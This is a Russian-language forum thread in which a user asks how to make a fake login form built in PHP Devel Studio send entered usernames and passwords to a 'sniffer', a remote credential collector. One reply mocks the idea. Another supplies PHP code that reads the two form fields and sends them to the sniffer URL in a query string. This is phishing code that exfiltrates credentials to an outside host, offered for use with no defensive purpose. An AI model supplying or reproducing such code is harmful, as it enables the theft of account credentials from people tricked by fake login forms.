Надежда Салтыкова

Как в PHP Devel Studio 3.0 отправить данные на снифер

Вот я создал фейк просто так ни для какой социальной сети, а просто фейк, я хачу ввести Лгоин и Пароль (ну ненастояший) и чтоб этот логин и пароль пришли мне на снифер, на снифере уже зарегестрирован, подскажите мне правильный код пожалуйста, хачу просто проверить будет программа работать моя или нет

ЗАРАНЕЕ СПАСИБО

Ин
Инесска

ой, послать данные на сниффер? какой-то голосок внутри моей головы подсказывает, что сниффер на то и сниффер, чтобы самостоятельно весь трафик шерстить.

Вася

Вот Пожалуйста
$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$url = "Сниффер";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
MessageBox("text", "text");